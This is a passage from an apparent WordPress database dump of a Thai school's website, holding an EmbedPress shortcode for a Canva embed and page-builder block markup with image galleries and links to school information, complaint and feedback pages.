embedpress_pro_twitch_logo_custom_dimension=\'false\' embedpress_pro_twitch_logo_xpos=\'false\' embedpress_pro_twitch_logo_ypos=\'false\' embedpress_pro_twitch_logo_opacity=\'false\' embedpress_pro_twitch_logo_opacity_hover=\'false\' embedpress_pro_twitch_cta=\'false\' limit=\'false\' orderby=\'false\' ytChannelLayout=\'false\' pagesize=\'false\' columns=\'false\' gapbetweenvideos=\'false\' pagination=\'false\' yt_sub_channel=\'false\' yt_sub_text=\'false\' yt_sub_layout=\'false\' yt_sub_theme=\'false\' yt_sub_count=\'false\' yt_lc_show=\'false\' layout=\'false\' preset=\'false\' nftperrow=\'false\' gapbetweenitem=\'false\' collectionname=\'false\' nftimage=\'false\' nfttitle=\'false\' nftcreator=\'false\' nftprice=\'false\' nftlastsale=\'false\' nftbutton=\'false\' loadmore=\'false\' itemperpage=\'false\' nftrank=\'false\' nftdetails=\'false\' instafeedProfileImage=\'false\' instafeedProfileImageUrl=\'false\' instafeedFollowBtn=\'false\' instafeedPostsCount=\'false\' instafeedFollowersCount=\'false\' instafeedAccName=\'false\' instaLayout=\'false\' instafeedColumns=\'false\' instafeedColumnsGap=\'false\' embedpress_instafeed_slide_show=\'false\' embedpress_carousel_autoplay=\'false\' embedpress_carousel_autoplay_speed=\'false\' embedpress_carousel_transition_speed=\'false\' embedpress_carousel_loop=\'false\' embedpress_carousel_arrows=\'false\' embedpress_carousel_spacing=\'false\' instafeedPostsPerPage=\'false\' instafeedTab=\'false\' instafeedLikesCount=\'false\' instafeedCommentsCount=\'false\' instafeedPopup=\'false\' instafeedPopupFollowBtn=\'false\' instafeedLoadmore=\'false\' cEmbedType=\'false\' cPopupButtonTextColor=\'false\' cPopupButtonBGColor=\'false\' calendlyData=\'false\' hideCookieBanner=\'false\' hideEventTypeDetails=\'false\' cBackgroundColor=\'false\' cTextColor=\'false\' cButtonLinkColor=\'false\' theme=\'false\' color=\'false\' coverImageUrl=\'false\' hideDownload=\'false\' playlist=\'false\' playlistContinuous=\'false\' playlistLoop=\'false\' playlistAutoupdate=\'false\' hidePlaylistDescriptions=\'false\' hidePlaylistImages=\'false\' episodeImagePosition=\'false\' showChaptersImage=\'false\' hideLikes=\'false\' hideComments=\'false\' hideSharing=\'false\' hideLogo=\'false\' hideEpisodeDescription=\'false\' mode=\'false\' playerAutoplay=\'false\' delay=\'false\' repeat=\'false\' backgroundColor=\'false\' expiration=\'false\' adManager=\'false\' adSource=\'false\' adFileUrl=\'false\' adFileUrl1=\'false\' adXPosition=\'false\' adYPosition=\'false\' adUrl=\'false\' adSkipButton=\'false\' embedpress_lock_content=\'false\' embedpress_protection_type=\'false\' embedpress_select_roles=\'false\' embedpress_lock_content_password=\'false\' embedpress_enable_footer_message=\'false\' embedpress_content_share=\'false\' embedpress_content_share_position=\'false\' embedpress_content_title=\'false\' embedpress_content_descripiton=\'false\' embedpress_content_share_custom_thumbnail=\'false\' embedpress_share_facebook=\'false\' embedpress_share_twitter=\'false\' embedpress_share_pinterest=\'false\' embedpress_share_linkedin=\'false\' width=\'1200\' height=\'700\' align=\'false\' align_tablet=\'false\' align_mobile=\'false\' nft_item_background_color=\'false\' nft_collectionname_color=\'false\' nft_collectionname_hover_color=\'false\' nft_collectionname_typography_typography=\'false\' nft_collectionname_typography_font_family=\'false\' nft_collectionname_typography_font_size=\'false\' nft_collectionname_typography_font_weight=\'false\' nft_collectionname_typography_text_transform=\'false\' nft_collectionname_typography_font_style=\'false\' nft_collectionname_typography_text_decoration=\'false\' nft_collectionname_typography_line_height=\'false\' nft_collectionname_typography_letter_spacing=\'false\' nft_collectionname_typography_word_spacing=\'false\' nft_title_color=\'false\' nft_title_typography_typography=\'false\' nft_title_typography_font_family=\'false\' nft_title_typography_font_size=\'false\' nft_title_typography_font_weight=\'false\' nft_title_typography_text_transform=\'false\' nft_title_typography_font_style=\'false\' nft_title_typography_text_decoration=\'false\' nft_title_typography_line_height=\'false\' nft_title_typography_letter_spacing=\'false\' nft_title_typography_word_spacing=\'false\' nft_creator_color=\'false\' nft_creator_typography_typography=\'false\' nft_creator_typography_font_family=\'false\' nft_creator_typography_font_size=\'false\' nft_creator_typography_font_weight=\'false\' nft_creator_typography_text_transform=\'false\' nft_creator_typography_font_style=\'false\' nft_creator_typography_text_decoration=\'false\' nft_creator_typography_line_height=\'false\' nft_creator_typography_letter_spacing=\'false\' nft_creator_typography_word_spacing=\'false\' nft_created_by_color=\'false\' nft_created_by_typography_typography=\'false\' nft_created_by_typography_font_family=\'false\' nft_created_by_typography_font_size=\'false\' nft_created_by_typography_font_weight=\'false\' nft_created_by_typography_text_transform=\'false\' nft_created_by_typography_font_style=\'false\' nft_created_by_typography_text_decoration=\'false\' nft_created_by_typography_line_height=\'false\' nft_created_by_typography_letter_spacing=\'false\' nft_created_by_typography_word_spacing=\'false\' nft_price_color=\'false\' nft_price_typography_typography=\'false\' nft_price_typography_font_family=\'false\' nft_price_typography_font_size=\'false\' nft_price_typography_font_weight=\'false\' nft_price_typography_text_transform=\'false\' nft_price_typography_font_style=\'false\' nft_price_typography_text_decoration=\'false\' nft_price_typography_line_height=\'false\' nft_price_typography_letter_spacing=\'false\' nft_price_typography_word_spacing=\'false\' nft_last_sale_color=\'false\' nft_last_sale_typography_typography=\'false\' nft_last_sale_typography_font_family=\'false\' nft_last_sale_typography_font_size=\'false\' nft_last_sale_typography_font_weight=\'false\' nft_last_sale_typography_text_transform=\'false\' nft_last_sale_typography_font_style=\'false\' nft_last_sale_typography_text_decoration=\'false\' nft_last_sale_typography_line_height=\'false\' nft_last_sale_typography_letter_spacing=\'false\' nft_last_sale_typography_word_spacing=\'false\' nftbutton_color=\'false\' nftbutton_bg_color=\'false\' nftbutton_typography_typography=\'false\' nftbutton_typography_font_family=\'false\' nftbutton_typography_font_size=\'false\' nftbutton_typography_font_weight=\'false\' nftbutton_typography_text_transform=\'false\' nftbutton_typography_font_style=\'false\' nftbutton_typography_text_decoration=\'false\' nftbutton_typography_line_height=\'false\' nftbutton_typography_letter_spacing=\'false\' nftbutton_typography_word_spacing=\'false\' nft_loadmore_color=\'false\' nft_loadmore_typography_typography=\'false\' nft_loadmore_typography_font_family=\'false\' nft_loadmore_typography_font_size=\'false\' nft_loadmore_typography_font_weight=\'false\' nft_loadmore_typography_text_transform=\'false\' nft_loadmore_typography_font_style=\'false\' nft_loadmore_typography_text_decoration=\'false\' nft_loadmore_typography_line_height=\'false\' nft_loadmore_typography_letter_spacing=\'false\' nft_loadmore_typography_word_spacing=\'false\' nft_loadmore_bgcolor=\'false\' nftrank_label_color=\'false\' nftrank_label_typography_typography=\'false\' nftrank_label_typography_font_family=\'false\' nftrank_label_typography_font_size=\'false\' nftrank_label_typography_font_weight=\'false\' nftrank_label_typography_text_transform=\'false\' nftrank_label_typography_font_style=\'false\' nftrank_label_typography_text_decoration=\'false\' nftrank_label_typography_line_height=\'false\' nftrank_label_typography_letter_spacing=\'false\' nftrank_label_typography_word_spacing=\'false\' nftrank_color=\'false\' nftrank_border_color=\'false\' nftrank_typography_typography=\'false\' nftrank_typography_font_family=\'false\' nftrank_typography_font_size=\'false\' nftrank_typography_font_weight=\'false\' nftrank_typography_text_transform=\'false\' nftrank_typography_font_style=\'false\' nftrank_typography_text_decoration=\'false\' nftrank_typography_line_height=\'false\' nftrank_typography_letter_spacing=\'false\' nftrank_typography_word_spacing=\'false\' nftdetail_title_color=\'false\' nftdetail_title_typography_typography=\'false\' nftdetail_title_typography_font_family=\'false\' nftdetail_title_typography_font_size=\'false\' nftdetail_title_typography_font_weight=\'false\' nftdetail_title_typography_text_transform=\'false\' nftdetail_title_typography_font_style=\'false\' nftdetail_title_typography_text_decoration=\'false\' nftdetail_title_typography_line_height=\'false\' nftdetail_title_typography_letter_spacing=\'false\' nftdetail_title_typography_word_spacing=\'false\' nftdetail_color=\'false\' nftdetail_typography_typography=\'false\' nftdetail_typography_font_family=\'false\' nftdetail_typography_font_size=\'false\' nftdetail_typography_font_weight=\'false\' nftdetail_typography_text_transform=\'false\' nftdetail_typography_font_style=\'false\' nftdetail_typography_text_decoration=\'false\' nftdetail_typography_line_height=\'false\' nftdetail_typography_letter_spacing=\'false\' nftdetail_typography_word_spacing=\'false\' nftdetail_link_color=\'false\' nftdetail_link_typography_typography=\'false\' nftdetail_link_typography_font_family=\'false\' nftdetail_link_typography_font_size=\'false\' nftdetail_link_typography_font_weight=\'false\' nftdetail_link_typography_text_transform=\'false\' nftdetail_link_typography_font_style=\'false\' nftdetail_link_typography_text_decoration=\'false\' nftdetail_link_typography_line_height=\'false\' nftdetail_link_typography_letter_spacing=\'false\' nftdetail_link_typography_word_spacing=\'false\' _title=\'false\' _element_width=\'false\' _element_width_tablet=\'false\' _element_width_mobile=\'false\' _element_custom_width=\'false\' _grid_column=\'false\' _grid_column_custom=\'false\' _grid_row=\'false\' _grid_row_custom=\'false\' _flex_align_self=\'false\' _flex_order=\'false\' _flex_order_custom=\'false\' _flex_size=\'false\' _flex_grow=\'false\' _flex_shrink=\'false\' _element_vertical_align=\'false\' _position=\'false\' _offset_orientation_h=\'false\' _offset_x=\'false\' _offset_x_end=\'false\' _offset_orientation_v=\'false\' _offset_y=\'false\' _offset_y_end=\'false\' _z_index=\'false\' _element_id=\'false\' _css_classes=\'false\' _element_cache=\'false\' _animation=\'false\' _animation_tablet=\'false\' _animation_mobile=\'false\' animation_duration=\'false\' _animation_delay=\'false\' _transform_rotate_popover=\'false\' _transform_rotateZ_effect=\'false\' _transform_rotateZ_effect_tablet=\'false\' _transform_rotateZ_effect_mobile=\'false\' _transform_rotate_3d=\'false\' _transform_rotateX_effect=\'false\' _transform_rotateX_effect_tablet=\'false\' _transform_rotateX_effect_mobile=\'false\' _transform_rotateY_effect=\'false\' _transform_rotateY_effect_tablet=\'false\' _transform_rotateY_effect_mobile=\'false\' _transform_perspective_effect=\'false\' _transform_perspective_effect_tablet=\'false\' _transform_perspective_effect_mobile=\'false\' _transform_translate_popover=\'false\' _transform_translateX_effect=\'false\' _transform_translateX_effect_tablet=\'false\' _transform_translateX_effect_mobile=\'false\' _transform_translateY_effect=\'false\' _transform_translateY_effect_tablet=\'false\' _transform_translateY_effect_mobile=\'false\' _transform_scale_popover=\'false\' _transform_keep_proportions=\'yes\' _transform_scale_effect=\'false\' _transform_scale_effect_tablet=\'false\' _transform_scale_effect_mobile=\'false\' _transform_scaleX_effect=\'false\' _transform_scaleX_effect_tablet=\'false\' _transform_scaleX_effect_mobile=\'false\' _transform_scaleY_effect=\'false\' _transform_scaleY_effect_tablet=\'false\' _transform_scaleY_effect_mobile=\'false\' _transform_skew_popover=\'false\' _transform_skewX_effect=\'false\' _transform_skewX_effect_tablet=\'false\' _transform_skewX_effect_mobile=\'false\' _transform_skewY_effect=\'false\' _transform_skewY_effect_tablet=\'false\' _transform_skewY_effect_mobile=\'false\' _transform_flipX_effect=\'false\' _transform_flipY_effect=\'false\' _transform_rotate_popover_hover=\'false\' _transform_rotateZ_effect_hover=\'false\' _transform_rotateZ_effect_hover_tablet=\'false\' _transform_rotateZ_effect_hover_mobile=\'false\' _transform_rotate_3d_hover=\'false\' _transform_rotateX_effect_hover=\'false\' _transform_rotateX_effect_hover_tablet=\'false\' _transform_rotateX_effect_hover_mobile=\'false\' _transform_rotateY_effect_hover=\'false\' _transform_rotateY_effect_hover_tablet=\'false\' _transform_rotateY_effect_hover_mobile=\'false\' _transform_perspective_effect_hover=\'false\' _transform_perspective_effect_hover_tablet=\'false\' _transform_perspective_effect_hover_mobile=\'false\' _transform_translate_popover_hover=\'false\' _transform_translateX_effect_hover=\'false\' _transform_translateX_effect_hover_tablet=\'false\' _transform_translateX_effect_hover_mobile=\'false\' _transform_translateY_effect_hover=\'false\' _transform_translateY_effect_hover_tablet=\'false\' _transform_translateY_effect_hover_mobile=\'false\' _transform_scale_popover_hover=\'false\' _transform_keep_proportions_hover=\'yes\' _transform_scale_effect_hover=\'false\' _transform_scale_effect_hover_tablet=\'false\' _transform_scale_effect_hover_mobile=\'false\' _transform_scaleX_effect_hover=\'false\' _transform_scaleX_effect_hover_tablet=\'false\' _transform_scaleX_effect_hover_mobile=\'false\' _transform_scaleY_effect_hover=\'false\' _transform_scaleY_effect_hover_tablet=\'false\' _transform_scaleY_effect_hover_mobile=\'false\' _transform_skew_popover_hover=\'false\' _transform_skewX_effect_hover=\'false\' _transform_skewX_effect_hover_tablet=\'false\' _transform_skewX_effect_hover_mobile=\'false\' _transform_skewY_effect_hover=\'false\' _transform_skewY_effect_hover_tablet=\'false\' _transform_skewY_effect_hover_mobile=\'false\' _transform_flipX_effect_hover=\'false\' _transform_flipY_effect_hover=\'false\' motion_fx_transform_x_anchor_point=\'false\' motion_fx_transform_y_anchor_point=\'false\' _background_background=\'false\' _background_color=\'false\' _background_color_stop=\'false\' _background_color_b=\'false\' _background_color_b_stop=\'false\' _background_gradient_type=\'false\' _background_gradient_angle=\'false\' _background_gradient_position=\'false\' _background_image=\'false\' _background_position=\'false\' _background_xpos=\'false\' _background_ypos=\'false\' _background_attachment=\'false\' _background_repeat=\'false\' _background_size=\'false\' _background_bg_width=\'false\' _background_video_link=\'false\' _background_video_start=\'false\' _background_video_end=\'false\' _background_play_once=\'false\' _background_play_on_mobile=\'false\' _background_privacy_mode=\'false\' _background_video_fallback=\'false\' _background_slideshow_gallery=\'false\' _background_slideshow_loop=\'false\' _background_slideshow_slide_duration=\'false\' _background_slideshow_slide_transition=\'false\' _background_slideshow_transition_duration=\'false\' _background_slideshow_background_size=\'false\' _background_slideshow_background_position=\'false\' _background_slideshow_lazyload=\'false\' _background_slideshow_ken_burns=\'false\' _background_slideshow_ken_burns_zoom_direction=\'false\' _background_hover_background=\'false\' _background_hover_color=\'false\' _background_hover_color_stop=\'false\' _background_hover_color_b=\'false\' _background_hover_color_b_stop=\'false\' _background_hover_gradient_type=\'false\' _background_hover_gradient_angle=\'false\' _background_hover_gradient_position=\'false\' _background_hover_image=\'false\' _background_hover_position=\'false\' _background_hover_xpos=\'false\' _background_hover_ypos=\'false\' _background_hover_attachment=\'false\' _background_hover_repeat=\'false\' _background_hover_size=\'false\' _background_hover_bg_width=\'false\' _background_hover_video_link=\'false\' _background_hover_video_start=\'false\' _background_hover_video_end=\'false\' _background_hover_play_once=\'false\' _background_hover_play_on_mobile=\'false\' _background_hover_privacy_mode=\'false\' _background_hover_video_fallback=\'false\' _background_hover_slideshow_gallery=\'false\' _background_hover_slideshow_loop=\'false\' _background_hover_slideshow_slide_duration=\'false\' _background_hover_slideshow_slide_transition=\'false\' _background_hover_slideshow_transition_duration=\'false\' _background_hover_slideshow_background_size=\'false\' _background_hover_slideshow_background_position=\'false\' _background_hover_slideshow_lazyload=\'false\' _background_hover_slideshow_ken_burns=\'false\' _background_hover_slideshow_ken_burns_zoom_direction=\'false\' _border_border=\'false\' _border_width=\'false\' _border_color=\'false\' _box_shadow_box_shadow_type=\'false\' _box_shadow_box_shadow=\'false\' _box_shadow_box_shadow_position=\'false\' _border_hover_border=\'false\' _border_hover_width=\'false\' _border_hover_color=\'false\' _box_shadow_hover_box_shadow_type=\'false\' _box_shadow_hover_box_shadow=\'false\' _box_shadow_hover_box_shadow_position=\'false\' _mask_switch=\'false\' _mask_shape=\'false\' _mask_image=\'false\' _mask_notice=\'false\' _mask_size=\'false\' _mask_size_scale=\'false\' _mask_position=\'false\' _mask_position_x=\'false\' _mask_position_y=\'false\' _mask_repeat=\'false\' hide_desktop=\'false\' hide_tablet=\'false\' hide_mobile=\'false\']https://www.canva.com/design/DAGsFHWqrOk/eCZISZCLZjZV8cpVDnNIUA/view[/embedpress]','E-SERVICE','','inherit','closed','closed','','459-revision-v1','','','2025-07-03 11:46:59','2025-07-03 04:46:59','',459,'http://pakhaeng.ssk.in.th/?p=1651',0,'revision','',0),
(1653,1,'2025-07-03 11:53:14','2025-07-03 04:53:14','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_e96e1d-10\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_cddd30-7b\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_cddd30-7b\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_8eda8b-3a\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_386744-46\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=1523\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_3c234c-51\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_3c234c-51\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_bead82-d8\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_941599-c9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_941599-c9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_67d38e-c6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_67d38e-c6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_4b01f7-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_4b01f7-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_61e97e-78\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_61e97e-78\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_0f2844-d8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_0f2844-d8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_cba4c7-2c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_cba4c7-2c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_bf6039-24\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_bf6039-24\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_d4f0fe-83\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_d4f0fe-83\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" 